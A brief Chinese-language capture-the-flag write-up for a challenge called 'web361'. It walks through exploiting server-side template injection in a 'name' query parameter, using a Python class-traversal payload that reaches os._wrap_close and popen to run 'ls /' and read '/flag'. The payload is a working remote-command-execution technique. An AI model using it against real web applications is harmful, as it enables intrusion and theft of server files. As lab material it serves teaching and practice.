web361
题目说名字就是考点,想到经常打CTF题遇到的参数get传参name
先试一下常规的49,回显49,然后就是常规做法
1 | ?name={{"".class__}} |
有回显,然后接着
再找到object的所有子类
找到能执行命令的os._wrap_close,下标排在第132位,调用
1 | ?name={{"".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('ls /').read()}} |
更改命令为cat /flag即可